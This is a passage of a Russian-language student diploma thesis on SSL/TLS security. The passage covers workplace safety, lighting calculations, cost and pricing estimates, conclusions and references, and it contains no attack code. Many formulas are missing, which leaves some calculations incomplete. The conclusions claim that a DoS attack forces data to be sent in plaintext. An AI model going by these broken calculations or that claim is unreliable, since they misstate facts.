Анализ защищенности протокола SSL/TLS при использовании криптопримитивов

Обзор известных методов обеспечения безопасности Web-транзакций. Протокол SSL/TLS как эффективный метод обеспечения их защищенности. Анализ и моделирование существующих атак на протокол SSL/TLS. Особенности защиты сети "клиент-сервер" от такого рода атак.

Рубрика Программирование, компьютеры и кибернетика
Вид дипломная работа
Язык украинский
Дата добавления 05.06.2011
Размер файла 2,6 M

Отправить свою хорошую работу в базу знаний просто. Используйте форму, расположенную ниже

Студенты, аспиранты, молодые ученые, использующие базу знаний в своей учебе и работе, будут вам очень благодарны.

В - влияние «Ч-М-С» на внешние факторы (взаимодействия производственной среды с окружающей природной средой.).

Безопасность труда в системе «Ч-М-С» определяют побочные (вредные) связи (рисунок 3.1), которые являются причиной существования опасностей в помещении НИЛ.

Рисунок 3.1 - Структура системы «Человек - Машина - Среда» для НИЛ.

На рисунке 3.1 приведены обозначения:

1 - (Ч1-М1) воздействие человека на управление машиной и ее настройки (программирование, аудит);

2 - (ПТ-М1) информация о состоянии предмета труда, управляемая машиной (исходные данные программы);

3 - (М1-ПТ) воздействие машины на предмет труда (компиляция программного кода);

4 - (Ч2-С)влияние "человека" на "среду" (теплообмен, шум) ;

5 - (С-Ч3) влияние "среды" на психофизиологическое состояние "человека" (утомление, перенапряженность анализаторов);

6 - (С-Ч1) влияние "среды" на качество работы "человека" (физическая и умственная активность);

7 - (М1-С) влияние "машины" на состояние "среды" (Эл.магн. излучение, тепло);

8 - (С-М1, С-М3) влияние "среды" на качество работы "машины" (повышение температуры деталей компьютера);

9 - (Ч1-Ч3) связь выполняемой работы с психофизиологическим состоянием организма (утомление, умственная перенапряженность);

10 - (Ч1-Ч2) влияние характера труда на интенсивность обмена веществ;

11 - (Ч3-Ч3) взаимодействие людей между собой ;

12 - (М1-Ч1) информация о состоянии машины, обрабатываемая человеком (программный код, изображенный на мониторе);

13 - (М1-М2) информационная связь между компьютером и защитной функцией;

14 - аварийное управляющее воздействие (М2-М1).

Анализ побочных (вредных) связей позволяет выделить следующие опасности: аномальный микроклимат, выполнение физической или умственной работы, несоответствие показателей естественного и искусственного освещения характеристикам человека, опасность поражения человека электрическим током, шумовое воздействие. Иные опасности, например, патогенные микроорганизмы, ядовитые химические вещества и др. маловероятны. Следовательно, при определенных условиях случайного или детерминированного характера в помещении НИЛ возможно возникновение опасных и вредных производственных факторов (ОВПФ), способных привести к снижению работоспособности, травме или заболеванию человека. В таблице 3.1 перечислены возможные ОВПФ с указанием их источника, фактического уровня в НИЛ и последствий воздействия на человека.

Для обеспечения нормальных условий труда в помещении НИЛ необходимо:

1) разработать организационные и технические мероприятия для обеспечения безопасности труда при работе с электрооборудованием (ПЭВМ, принтеры);

2) разработать организационные и технические мероприятия и выбрать технические средства для обеспечения необходимых санитарно-гигиенических условий труда;

3) выполнить размещение и организацию рабочих мест и назначить режим труда и отдыха;

4) разработать мероприятия по пожарной профилактике.

Проанализировав таблицу 3.1, видно, что в помещении слабое освещение. Поэтому доминирующим вредным фактором выберем нехватку искусственного освещения рабочей зоны.

Таблица 3.1 - Оценка факторов производственной среды и трудового процесса

Факторы производственной среды и трудового процесса

Значение

Фактора

(ПДК, ПДУ)

3 класс - опасные и вредные условия, характер труда

Продолжительность

(% за смену)

Норма

Факт

1 ст

2 ст

1. Шум

60 Дб

45 Дб

-

-

75-80%

2. Неионизирующие

излучения:

- промышленной частоты

25 В/м

20 В/м

-

-

80-90%

- радиочастотного диапазона

2,5 В/м

1,8 В/м

-

-

100%

3. Рентгеновское

излучение

100

мкР/ч

65

мкР/ч

-

-

80-90%

4. Микроклимат:

- температура воздуха

23-25оС

23оС

100%

- скорость движения

воздуха

0.1

м/c

0.1

м/с

-

-

80-90%

- относительная влажность

40-60%

50%

-

-

100%

5. Освещение:

- естественное

2%

2%

-

-

лет.вр 80%

зим.вр. 55%

- искусственное

300-500 Лк

250 Лк

-

250 Лк

лет.вр 20%

зим.вр. 45%

6. Тяжесть труда:

- Мелкие стереотипные движения кистей и пальцев рук (количество за смену)

40000

20000

-

-

75-80%

7.Напряженность труда

а) напряженность анализаторов:

- зрение (категория работ)

Точные работы

Точные работы

-

-

75-80%

б) эмоциональное и

интеллектуальное напряжение

Решение задач без ограничения по времени

Решение задач без ограничения по времени

-

-

60%

8. Сменность

8-часовая смена

8-часовая смена

-

-

100%

3.2 Техника безопасности

По степени опасности поражения электрическим током, согласно ПУЭ-85 [28], помещение НИЛ относится к классу помещений с повышенной опасностью, поскольку в помещении возможно одновременное прикосновение к корпусам ПЭВМ или принтера с одной стороны и к заземленным металлическим конструкциям помещения (батареи отопления) с другой стороны. Для приведения к помещениям без повышенной опасности следует оградить батареи деревянными решетками.

Электроснабжение НИЛ осуществляется от трехфазной четырёхпроводной сети с глухозаземленной нейтралью, ток переменный, частота 50 Гц, напряжение 220/380 В. Согласно требованиям ПУЭ [18], ГОСТ 12.1.019-79 [15], ГОСТ 12.1.030-8 [16] для обеспечения безопасности необходимо выполнить зануление. Для этого следует преднамеренно электрически соединить с нулевым проводником сети корпуса всех ПЭВМ и принтера, которые могут случайно оказаться под напряжением. Соединение выполнить проводником, марка и сечение которого такие же, как и фазовый проводник сети. Зануление превращает замыкание на корпус ПЭВМ или принтера в однофазное короткое замыкание и отключение поврежденного участка сети осуществляется автоматом защиты, ток срабатывания которого должен превышать в 5-7 раз максимальный ток, потребляемый электрооборудованием в НИЛ (для исключения срабатывания автомата защиты при включении электрооборудования), но быть меньше в 1,4 раза тока короткого замыкания (ток, потребляемый электрооборудованием меньше 100А). Время отключения поврежденного участка сети должно быть не более 0,1-0,2с.

Для уменьшения напряжения, приложенного к телу человека при пробое фазы на корпус ПЭВМ или принтера, необходимо выполнить повторное заземление нейтрали. Для этого соединенные между собой корпуса ПЭВМ и принтера следует заземлить, используя естественные и искусственные заземлители. Сопротивление повторного заземления не должно превышать 10 Ом [28].

Необходимо проводить контроль изоляции. Контроль проводить между нулем и фазой и между фазами. Сопротивление изоляции должно быть не менее 0.5 МОм [28]. Контроль проводить не реже 1 раза в год при отключенном электропитании.

Электросеть розеток для питания ПЭВМ следует согласно [26] проложить под съемным полом в гибких металлических рукавах.

Согласно [26] запрещается:

- применять самодельные удлинители, не соответствующие требования ПУЭ к переносным электропроводкам;

- применять для отопления нестандартное электронагревательное оборудование;

- пользоваться поврежденными розетками, разветвителями, коробками, выключателями и другими электроизделиями.

Согласно требованиям ДНАОП 0.00-4.12-99 [23] необходимо проводить вводный, первичный на рабочем месте, повторный, а при необходимости -внеплановый и целевой инструктажи.

Вводный инструктаж необходимо проводить при поступлении на работу. Инструктаж организует и проводит служба охраны труда, факт инструктажа фиксируется в журнале вводного инструктажа.

Первичный инструктаж необходимо проводить непосредственно на рабочем месте. Факт инструктажа необходимо фиксировать в журнале первичного инструктажа. Аналогично с периодичностью 1 год проводить повторные инструктажи.

Внеплановый инструктаж следует проводить при изменении условий труда, введения в эксплуатацию новой техники, а также при несчастных случаях.

Целевой инструктаж в НИЛ необходимо проводить при выполнении работниками НИЛ работ, не связанных с их основными обязанностями.

Содержание всех инструктажей должно соответствовать требованиям ДНАОП 0.04.4.12-94 [23].

При обслуживании, ремонте и наладке ПЭВМ необходимо руководствоваться «Правилами охраны труда при эксплуатации электронно-вычислительных машин» [22].

3.3 Производственная санитария и гигиена труда

Работа в НИЛ производится сидя и не требует систематического физического напряжения. Работа в НИЛ производится сидя и не требуется систематического физического напряжения. Согласно ГОСТ 12.1.005-88 [12] и ДСН 3.3.6.042-99 работа относится к категории легкой 1а и для нее установлены параметры микроклимата, приведенные в таблице 3.2.

Таблица 3.2 - Оптимальные нормы микроклимата

Время года

Температура

воздуха, град. С

Относительная

влажность воздуха, %

Скорость

движения воздуха, м/с

Холодное

22-24

40-60

0.1

Теплое

23-25

40-60

0.1

Оптимальные метеопараметры поддерживаются в холодное время системой отопления, в теплый период системой кондиционирования .

Согласно ГОСТ 12.1.005-88 [12] и ДСН 3.3.6.042-99 работа относится к категории легкой 1а и для нее установлены параметры освещенности не менее 300лк.

Как следует из таблицы 3.1 фактические значения ОВПФ недостаточная освещенность рабочей зоны не соответствуют нормам. Для обеспечения установленных норм освещения в помещении НИЛ следует применять искусственное освещение.

При проектировании осветительной установки необходимо решить следующие основные вопросы:

выбрать тип источника света -- рекомендуются газоразрядные лампы, за исключением мест, где температура воздуха может быть менее -5 ° С и напряжение в сети падать ниже 90 % номинального, а также местного освещения (в этих случаях применяются лампы накаливания);

определить систему освещения (общая локализованная или равномерная, комбинированная);

выбрать тип светильников с учетом характеристик светораспределения, условий среды (конструктивного исполнения) и др.;

распределить светильники и определить их количество (светильники могут располагаться рядами, в шахматном порядке, ромбовидно);

определить норму освещенности на рабочем месте.

Для расчета общего равномерного освещения при горизонтальной рабочей поверхности основным является метод коэффициента использования светового потока, учитывающий световой поток, отраженный от потолка и стен [34]. Световой поток лампы Фл, лм, при лампах накаливания или световой поток группы ламп светильника при люминесцентных лампах рассчитывают по формуле

, (3.1)

где E -- нормированная минимальная освещенность, л к; S -- площадь освещаемого помещения, м2; Z -- коэффициент неравномерности освещения (Z = 1,1... 1,5); -- коэффициент запаса, учитывающий снижение освещенности из-за загрязнения и старения лампы (= 1,2... 1,7); N -- число светильников;-- коэффициент затенения вводится для помещения с фиксированным положением работающих, принимают равным 0.8 - 0.9; -- коэффициент использования осветительной установки = 0,2...0,7); значение определяют в зависимости от показателя помещения; число рядов светильников.

Зрительная работа оператора ПЭВМ является работой высокой точности, поскольку наименьший размер объекта различения 0.3 - 0.5 мм и разряд зрительной работы - 1Г. По требованиям СНиП П-4-79 [31] величина коэффициента естественной освещенности (КЕО) должна быть равна 2 %. Естественный свет проникает в помещение НИЛ через боковые светопроёмы, что соответствует требованиям [26]. Окна должны иметь жалюзи или шторы. Искусственное освещение необходимо выполнить в виде сплошных или прерывистых линий светильников, расположенных параллельно линии зрения операторов [26]. Освещенность при работе с экраном в сочетании с работой над документами должна быть не менее 300 лк [30]. В качестве источников света рекомендуется применять люминесцентные лампы [19, 26].

Вычисляем индекс помещения по следующей формуле:

, (3.2)

где А и В -- длина и ширина помещения, м;

hр -- высота светильников над рабочей поверхностью, м;

і - индекс помещения.

, (3.3)

где -геометрическая высота помещения, м;

-высота стола(0.8м);

-расстояние от потолка до нижней плоскости светильника (0.3м).

.

С учетом коэффициентов удельного отражения пола ( 30 ), стен (50 ) и потолка ( 70 ) коэффициент отражения .

Для освещения с гигиенической и экономической точек зрения предпочтительны светильники ПВАМ-2 х 40 (двухламповые). Световой поток ламп ЛБ-40 2000 лм.

тогда

При выбранном типе и мощности люминесцентных ламп определяется необходимое число светильников N по методу светового потока может быть определено из выражения

, (3.4)

Расстояние от светильника до стены определяется выражением

, (3.5)

где расстояние между рядами светильников и определяется

, (3.6)

где принимается равным 1.4, тогда

м.

Тогда м.

Число рядов светильников определяется как

тогда

,

где согласно ДНАОП 0.00-1.31-99. 9 (“Правила охорони праці при експлуатації електронно-обчислювальних машин”) [22], -- коэффициент запаса, учитывающий снижение освещенности из-за загрязнения и старения лампы примем равным 1,2.

Таким образом, установим 2 светильника в ряд.

План размещения светильников в помещении приведен на рисунке 3.2

Рисунок 3.2 - План размещения светильников в помещении

Эквивалентный уровень звукового давления на рабочем месте не должен превышать 50 дБ(А) (ДСН 3.3.6.037-99),[12]. Для снижения шума в помещении выполнена акустическая обработка помещения звукопоглощающими материалами [29].

Каждое рабочее место в НИЛ должно соответствовать требованиям ГОСТ 12.2.032-78 [17]. Рабочие места следует расположить относительно световых проемов так, чтобы естественный свет падал со стороны, преимущественно слева, при этом должны быть выдержаны следующие расстояния [22]:

- от стен со световыми проемами до рабочего места - не менее 1 м;

- между боковыми поверхностями видеотерминалов - не менее 1,2 м;

- между тыльной поверхностью одного видеотерминала и экраном - не менее 2,5 м.

Размещение рабочих мест в НИЛ показано на рисунке 3.3.

Рисунок 3.3 - Размещение рабочих мест и маршрут эвакуации при пожаре

На рисунке 3.3 приведены следующие обозначения:

1 - рабочие места; 2 - место расположения принтера; 3 - стеллаж для документов и шкаф для одежды; 4 - оконные проёмы; 5 - дверной проём;

- маршрут эвакуации при пожаре.

Организация рабочего (каждого места должна обеспечивать соответствие всех элементов рабочего места и их расположения эргономическим требованиям в соответствии с [31]. Высота рабочей поверхности стола для ПЭВМ должна регулироваться в пределах 680-800 мм, ширина стола - 600-1400 мм, глубина стола - 800-1000 мм [22]. Данные размеры соответствуют размерам рабочих мест, показанных на рисунке 8.2. Рабочий стол должен иметь пространство для ног высотой не менее 600 мм и шириной не менее 500 мм. Если у оператора ноги не достают до пола, необходимо применить подставку для ног. Сидение должно быть подъемно - поворотным, регулироваться по высоте, углу наклона как самого сидения, так и спинки, а также регулироваться по расстоянию спинки к переднему краю сидения и по высоте подлокотников. Правильный выбор параметров стола и, главное сидения, позволяет снизить статические ''перегрузки мышц”.

Для уменьшения перегрузки зрительных анализаторов экран видеотерминала расположить на оптимальном расстоянии от глаз: при размере экрана по диагонали 17" - следует расположить экран видеотерминала на расстоянии 700... 800 мм, [22].

Трудовая деятельность в НИЛ относится к группе «В» (отладка программ, перевод и редактирования и др.) и установлена 8-часовая рабочая смена, иначе -продолжительность работ группы «В» превышает 4 ч и выполняемые работы относятся к III категории работ [26]. Для уменьшения действия психофизиологических ОВПФ (умственное перенапряжение, монотонность труда и эмоциональные перегрузки) для данной категории работ следует установить перерывы по 20 мин каждый через 2 ч после начала работ, через 1,5 ч и 2, 5 ч после обеденного перерыва или же по 5-15 мин через каждый час работы [26]. Общая продолжительность перерывов (не считая обеденного) за 8-часовый день должна составлять 60 мин.

3.4 Пожарная профилактика

НИЛ расположена на 2 этаже здания, выполненного из железобетонных конструкций, при работе здесь применяются твердые сгораемые материалы, в помещении находятся твердые и волокнистые горючие вещества. Поэтому согласно СНиП 2.01.02-85 [31] здание имеет 1 степень огнестойкости, производство в НИЛ по пожаро- взрывобезопасности относится к категории «В», а по ПУЭ [28] помещение относится к классу П - IIа. Требования по пожаро- взрывобезопасности выполнены [26].

Причиной пожара в НИЛ могут быть короткое замыкание электропроводки; неисправность ПЭВМ и другого электрооборудования; нагрев проводников; курение в неположенном месте.

Для предупреждения пожара необходимо проводить ряд технических и организационных мероприятий, направленных на соблюдение установленного режима эксплуатации электрической сети, оборудования и соблюдения правил пожарной профилактики.

В соответствии с требованиями ГОСТ 12.1.004-91 [13], ГОСТ 12.4.009-83 [18], а также требований [26], помещение НИЛ должно быть оснащено:

- дымовыми пожарными оповестителями в количестве 5 штук (из расчета 2 оповестителя на каждые 20 м площади помещения);

- углекислотными переносными огнетушителями емкостью не менее 2 л в количестве 5 штук (из расчета 2 огнетушитель на 20 м2 площади, но не менее 2 в помещении); тип выбранного огнетушителя ОУ-2;

- ящик с песком.

Необходимо производить следующие организационные мероприятия:

- назначить ответственного по НИЛ за пожарную безопасность;

- включать вопросы по пожарной профилактики во все инструктажи по технике безопасности;

- запретить курение в неположенном месте, а также использование в НИЛ нестандартных (самодельных) электроприборов, в первую очередь нагревательных, назначить меры административной ответственности за нарушение этих запретов;

- контролировать изоляцию и состояние электропроводки и электрооборудования с периодичностью, указанной в подразделе 3.2.

В помещении 6 работающих, поэтому согласно [31, 13] эвакуацию при пожаре можно проводить через рабочий выход. Дополнительного эвакуационного выхода помещение не имеет и его не требуется. Схему эвакуации разместить на видном месте у выхода из помещения.

4. ТЕХНИКО-ЭКОНОМИЧЕСКОЕ ОБОСНОВАНИЕ

В данном разделе дипломной работы на основании исходных данных проводится ряд экономических расчетов для определения наиболее эффективного использования средств и определения конкурентоспособности разрабатываемого программного продукта.

Исходные данные приведены в таблице 4.1.

Таблица 4.1 - Исходные данные

Наименование

Обознач.

Ед. измер.

Числове значення

1

Затраты на маркетинг

М

Грн.

1000

2

Стоимость ОФ(разработка)

ОФр

Грн.

800

3

Стоимость ОФ(тиражирование)

ОФт

Грн.

600

4

Затраты на реализацию

Sb

Грн.

900

5

Стоимость сторонних организаций

СУ

Грн.

280

6

Затраты на командировки

КОМ

Грн.

230

7

Приобретение ИТ

НОУ

Грн.

2535

8

Амортизационные отчисления

Amt

%

17

9

Другие затраты

ДЗ

Грн.

111

10

Необлагаемый налогом мин.зарпл.

НМ

Грн.

17

11

Средне рассчитываемая ставка процента по заёмным средствам

СРСП

%

18

12

Ставка налогообложения прибыли

СтНП

%

25

13

Ставка налогообложения выручки

СтНВ

%

-

14

Налог на доб. стоимость

ПДВ

%

20

15

Объем тиража

R

Шт.

3

16

Сумма платежей и налогов

сonst

Грн.

540

17

Плече

ЗС/СС

1/1

4.1 Расчет расходов на маркетинг

Таблица 4.2 - Расчет расходов на маркетинг

Наименование маркетинговых мероприятий

Стоимость реализации мероприятия (грн.)

Данные про разработку товара

Данные по товарам-аналогам

Наим.1

1. Специальные организационные закупки и изучение специальных потребностей потребителей

250

500

2. Выставки

750

1200

Итого:

1000

1700

4.2 Расчет расходов на реализацию (коммерческую поддержку)

Таблица 4.3 - Расчет расходов на реализацию

Наименование маркетинговых мероприятий

Стоимость реализации мероприятия (грн.)

Данные про разработку товара

Данные по товарам-аналогам

Наим.1

1. Уровень компетентности при заключении торгового соглашения

(сами разработчики )

100

200

2. Формы поставок

(индивидуальные поставки по заказам)

100

300

3. Способы удовлетворения рекламаций (по адресу пользователя)

200

350

4.Способы тех.обслуживания (по условиям договора)

230

200

5. Формы платежей (расчет наличными)

270

100

6. Изменение условий контракта

-

-

7. Стоимость примененных ИТ

-

100

при организации работы

Итого:

900

1350

4.3 Расчет затрат на разработку

Затраты рассчитываются следующим образом:

(4.1)

где - затраты на материалы, используемые в процессе НИОКР;

- заработная плата специалистов с начислениями;

- затраты, связанные с затратами на ИТ;

КОМ - затраты, связанные с расходами на командировки.

Таблица 4.4 - Затраты на материалы

Наименование товара

Единицы измерения

Количество штук

Цена за единицу

Сумма, грн.

Бумага (А4 пл.80гр/м)

лист

300

0,03

9

СD-диск

шт

3

5

15

Другие канцелярские принадлежности

5

Итого:

29

Данные по ценам на материалы взяты на основе действующих рыночных цен.

Таблица 4.5 - Расчет фонда оплаты труда (ФОТ) на этапе разработки

Наименование должности

Количество специалистов

Час занятости ,час.

Тарифная ставка, грн/ч.

ФОТ, грн

1

Инженер-cист.

2

240

5,8

2800

2

Рук. разработ.

1

240

10,16

2440

3

Конс-т по ТЭО

1

240

4,16

1000

Итого:

ФОТ(р)=

6240

Расчет ФОТ(р) с начислениями:

ФОТ(р)нар = ФОП(р)·(1+П), (4.2)

где, П - налоги и платежи на ФОТ (31,8% - отчисления на обязательное государственное пенсионное страхование согласно с Законом Украины от 1.01.2006;

2.9% - отчисления на обязательное социальное страхование согласно с Законом Украины от 1.01.2006;

1,3% - отчисления на социальное страхование на случай безработицы согласно Закону Украины от 1.01.2006;

1,51% - отчисления на социальное страхование от несчастных случаев)

Итого П = 37,5

ФОТ(р) нар=6240(1+0,375)=8580 грн.

Рассчитаем суммы примененных средств ИТ:

НОУ(р)=1200+35=1235 грн.

Общая сумма расходов на разработку приведена в таблице 4.6.

Таблица 4.6 - Расходы на разработку Зниокр

Наименование

Обозначение

Сумма (грн.)

1

Материалы,

Мт(р)

29

2

Фонд оплати труда с начислением

ФОП(р)нар

8580

3

Затраты на командировки

КОМ

230

4

Стоимость ИТ

НОУ(р)

1235

Общие расходы на разработку

Зниокр=

10074

4.4 Расчет затрат на тиражирование

Рассчитаем стоимость материалов Мт(т), которые применяются на этапе тиражирования единицы товара. Для этого приведена таблица 4.7.

Таблица 4.7 - Затраты на материалы при тиражировании единицы товара

Наименование товара

Единицы измерения

Количество штук

Цена за единицу

Сумма, грн.

Бумага (А4 пл.80гр/м)

лист

700

0,03

21

СD-диск

шт

6

5

30

Другие канцелярские принадлежности

4

Итого:

Мт(т)

55

Для расчета фонда оплаты труда на этапе тиражирования единицы товара приведена таблица 4.8.

Таблица 4.8 - Расчет фонда оплаты труда (ФОТ) на этапе тиражирования единицы товара

Наименование должности

Количество специалистов

Час занятости ,час.

Тарифная ставка, грн/ч.

ФОТ, грн

1

Инженер

2

56

3,44

385

Итого:

ФОТ(т)=

385

ФОТ(т)нар = ФОП(т)*(1+П) (4.3)

По формуле 4.3 рассчитаем ФОТ с начислениями:

ФОТ(т)нар=385*(1+0,375)=529,4 грн.

Сделаем расчет суммы примененных ИТ:

НОУ(т)=1300 грн.

Общие затраты на тиражирование рассчитаем в таблице 4.9:

Таблица 4.9 - Расходы на тиражирование

Наименование

Обозначение

Сумма (грн.)

1

Материалы

Мт(р)

55

2

Фонд оплаты труда с начислением

ФОП(т)нар

529,4

3

Стоимость ИТ

НОУ(р)

1300

Общие расходы на тиражирование

Зтираж=

1884,4

4.5 Расчет полных затрат

Таблица 4.10 - Расчет полных затрат

Наименование статей калькуляции

Обозначение

Сумма

1

Затраты на маркетинг

М

1000

2

Работы и услуги сторонних организаций

СУ

280

3

Затраты на реализацию

Sb

900

4

Амортизационные затраты

Аморт

238

5

Затраты на командировки

Ком

230

6

Сумма постоянных платежей и налогов

сonst

540

7

Затраты на разработку

Зниокр.

10074

8

Затраты на тиражирование

Зтираж.

1884,4

9

Затраты на преобретение средств ИТ, использованных для

оформления

Зоф(с)

0

10

Другие затраты

ДЗ

111

11

Сумма вместе

Сумм

15257,4

12

Общепроизводственные затраты

Роп

6102,96

13

Общехозяйственные затраты

Рох

3051,48

14

Полные постоянные затраты

S(с)

24181,84

Рассчитаем коммунальный налог:

КН = , (4.4)

где ПЕРС = 8

НМ = 17 грн.

КН = 13,6 грн.

Рассчитаем ориентировочной величины тиража, если допустить, что цена товара должна быть приближенная к рыночной цене аналога Цр.

Nn= (4.5)

= 628,1 грн.

Nn=

Nn < R

Пусть переменные затраты на полный объем тиража составляет:

(4.6)

грн.

Полная сумма затрат на объем тиража составляет:

(4.7)

грн.

4.6 Планирование пассива баланса

Принимаем пассив аналитического баланса равным суммарным издержкам:

П = = грн.

ЗС = П - СС = П / 2 = 13033,12 грн.

Считая, что кредиторская задолженность равна: КЗ=0, получим величину финансовых затрат с кредиторами:

ФI = ЗС*СРСП = 13033,12*0,18 = 2345,96 грн.

4.7 Планирование необходимой чистой прибыли и ожидаемого изменения актива

Для определения желаемой чистой прибыли (ЧП), нужно установить сколько средств в будущем периоде нужно иметь для развития производства (РЗ). Затем установим желаемый размер чистой прибыли на одну акцию (ЧПА) и число акций (К) в будущем периоде. Произведение ЧПА*К=Потр является суммой средств, которые будут направлены на потребление (премии, бонусы).

Пусть РЗ = 2500 грн, ЧПА = 75 грн. и К=100

ЧП = 2500 + 75*100 = 10000 грн.

Рентабельность собственных средств вычисляем:

Вычислим норму распределения:

ВТР = РСС*(1-НР) = 76*(1-0,6)= 30 %

26066,24 грн.

Следовательно, новый актив предприятия вырастит и составит:

грн.

4.8 Расчет цены товара и финансового результата

Поскольку у нас налогу подлежит только прибыль, то воспользуемся следующей формулой:

, (4.8)

где - это коэффициент, который показывает размер налогов и отчислений, которые зависят от прибыли предприятия. Пусть = 0.

грн.

грн.

грн.

грн.

Рассчитаем выручку:

ВР=Ц*R (4.9)

ВР= 10578,78*3=31736,34 грн.

Рассчитаем брутто-результат эксплуатации инвестиций:

грн.

Рассчитаем добавленную стоимость:

(4.10)

грн.

Рассчитаем НДС:

НДС=ДС*ПДВ=0,2*23056,24=4611,25 грн.

Норма ДС =

НРЕІ=БП+ФІ=12500+2345,96=14845,96 грн.

ЕР=

Рассчитаем эффективность финансового рычага:

ЕФР=

Тогда на рисунке 4.1 наиболее подходит кривая дифференциала ЕР=3 СРСП. Отсюда следует, что соотношение ЗС/СС=1. Следовательно, имеем: ,

,

грн.

Рисунок 4.1 - Графики кривых дифференциалов

4.9 Расчет операционных показателей

(4.11)

ВМ=31736,34 -1884,4=29851,94 грн.

Тогда порог рентабельности составит:

(4.12)

грн.

ПР= грн.

Рассчитываем запас финансовой прочности по производимому товару:

(4.13)

ЗПФ=26585,09 - 21535,5=5049,59 грн.

Для определения силы воздействия операционного рычага используем формулу:

(4.14)

СВОР==2,99

Рисунок 4.2 - График «Порог рентабельности»

Таблица 4.11 - Основные результаты ТЕО

Заданный объем тиража,

R

Измененный объем тиража, R

Цена,

Ц(грн)

ЕР

%

РСС

%

Норма

ДС,%

ЕФР

%

СВОР

ЗФП

3

3

10578,78

57

76

0,15

29

1

2,99

1

5049,59

4.11 Расчет конкурентоспособности товара

Расчет конкурентоспособности производим методом главных компонент. Для этого необходимо построить аналоги в ряд, который характеризовал бы уровень (место) каждого аналога в зависимости от значения некоторого обобщенного показателя, то есть определить рейтинг по обобщенному показателю.

Для расчета использовался программный продукт mgk.exe.

Исходные данные приведены в таблице 4.12.

Таблица 4.12 _ Матрица параметров товаров (услуг)

Параметр

Разрабатываемый объект

Аналог 1

Аналог 2

Аналог 3

1

3

15

10

10

2

100

80

50

65

3

10578,78

25020

33560

15989

4

1000

5000

2000

1200

5

900

2300

1800

2150

Обратный вес назначен параметрам: 1 3 4 5

Технические параметры:

1 безопасное время;

2 вероятность успеха;

Экономические параметры:

3 цена продукта;

4 затраты на маркетинг;

5 затраты на сбыт.

Результаты расчетов:

Вклад в дисперсию 5-й ГК за счет 1-го параметра: 0,9598 Вклад в дисперсию 5-й ГК за счет 2-го параметра: 0,6812 Вклад в дисперсию 5-й ГК за счет 3-го параметра: 0,8075 Вклад в дисперсию 5-й ГК за счет 4-го параметра: 0,7242 Вклад в дисперсию 5-й ГК за счет 5-го параметра: 0,9059 Вклад в дисперсию 4-й ГК за счет 1-го параметра: 0,2537 Вклад в дисперсию 4-й ГК за счет 2-го параметра: -0,7247 Вклад в дисперсию 4-й ГК за счет 3-го параметра: -0,3759 Вклад в дисперсию 4-й ГК за счет 4-го параметра: 0,6371 Вклад в дисперсию 4-й ГК за счет 5-го параметра: 0,1020

Таблица 4.13 _ Значения главных компонент для товаров (услуг)

№ ГК

Разрабатываемый объект

Аналог 1

Аналог 2

Аналог 3

5

4,7457

-2,9646

-1,7346

-0,0465

4

-0,3625

-1,3688

1,3372

0,3941

Исходя из полученных результатов можно сделать вывод, что разрабатываемое устройство является конкурентоспособным и стоит на первом месте среди аналогов.

4.12 Выводы по расчётам

Расчёты показали, что производить данный продукт выгодно - вложив 16943,06 грн. и заняв 16943,06 грн. можно получить 10000 грн чистой прибыли. Товар конкурентоспособен - он превышает свои аналоги по всем техническим параметрам, поэтому спрос на разработку продукта будет намного выше, чем у аналогов. Разработка отвечает современным требованиям и является новинкой на рынке, поэтому нужно увеличить затраты на маркетинг.

ВЫВОДЫ

В ходе выполнения дипломной работы был изучен протокол защиты данных по удалённым соединениям (SSL/TLS). Исследован принцип работы данного протокола, сделана оценка безопасности передаваемых данных. Была рассмотрена модель угроз для протокола SSL/TLS. Были приведены существующие на данный момент атаки на протокол SSL/TLS, которые были проанализированы, на основании чего можно сделать вывод, что наиболее опасной является Dos-атака, т.к ее очень сложно предотвратить и при ее реализации протокол SSL перестает работать. Следовательно, все данные будут передаваться в открытом виде, а это противоречит всем правилам безопасности и приведет к серьезным последствиям для организации.

Следует заметить, что не менее опасна «высокоуровневая» атака, т.к при ее реализации и внедрении злоумышленник получает секреты, а это влечет за собой необратимые последствия. Вероятность атаки существует всегда, но можно принять ряд мер для усложнения реализации данной атаки. Для этого нужно шифровать открытые данные до того, как они будут переданы.

Присоединение к Интернету может дать огромные преимущества, хотя при этом нужно серьезно учесть вопросы, связанные с безопасностью соединения. В данной дипломной работе были рассмотрены вопросы, связанные с безопасностью, которые нужно учесть как организациям, собирающимся присоединиться к Интернету, так и организациям, уже присоединенным к Интернету. Зная методы борьбы с приведенными атаками на протокол SSL/TLS, мы сможем эффективно отражать атаки злоумышленников и, тем самым, защитить передаваемые данные.

Кроме непосредственной разработки программной реализации Dos-атаки, были произведены технико-коммерческое обоснование целесообразности его проектирования и анализ условий труда работников машинного зала.

В разделе “Технико-коммерческое обоснование” был произведен расчет основных финансовых показателей, произведен расчет конкурентоспособности товара. Полученные результаты говорят о том, что разработанный продукт является конкурентоспособным и стоит на первом месте среди аналогов.

В разделе “Охрана труда” был проведен анализ условий труда работников НИЛ. На его основе были определены наличие и возможность появления в помещении опасных и вредных производственных факторов (опасность поражения электрическим током, избыточное тепло (выделяемое оборудованием и людьми), шумы, статическое электричество, пожарная опасность). Также был определен доминирующий ОПФ (искусственное освещение), при этом были разработаны меры по его предупреждению, уменьшению или ликвидации его воздействия.

СПИСОК ССЫЛОК

Васильев Г.А. «Политика безопасности при работе в Internet», -Питер.1997-848с.

Громов В.И. «Энциклопедия компьютерной безопасности», М.: Мир, 1999.-608с.

Мартин Дж. «Об Internet и о безопасности».-М.: Мир, 1980.-608с.

Вейскас Дж. «Технология использования цифровой подписи».-: Питер.1997-848с.

Боуман Дж., «Атака через internet».-К:,1998-565с.

«Применение SSL протокола», Ульман Дж.

«Протокол TSL», Дейт К.

8. http://www.stunnel.org.

9. http://www.tripwiresecurity.com.

10. http:// www.esafe.com.

11. Бадалов А.Л., Михайлов А.С. Нормы на параметры электромагнитной совместимости РЭС: Справочник. - М.: Радио и связь, 1990. - 272 с.: ил.

12. ГОСТ 12.0.003-74. ССБТ. Опасные и вредные производственные факторы. Классификация.

13. ГОСТ 12.1.004-91. ССБТ. Пожарная безопасность. Общие требования.

14. ГОСТ 12.1.005-88. ССБТ. Общие санитарно-гигиенические требования к воздуху рабочей зоны.

15. ГОСТ 12.1.019-79. ССБТ. Электробезопасность. Общие требования.

16. ГОСТ 12.1.030-81. ССБТ. Электробезопасность. Защитное заземление. Зануление.

17. ГОСТ 12.2.031-78. ССБТ. Рабочее место при выполнении работ сидя. Общие эргономические требования.

18. ГОСТ 12.4.009-83. ССБТ. Пожарная техника для защиты объектов. Основные виды. Размещение и обслуживание.

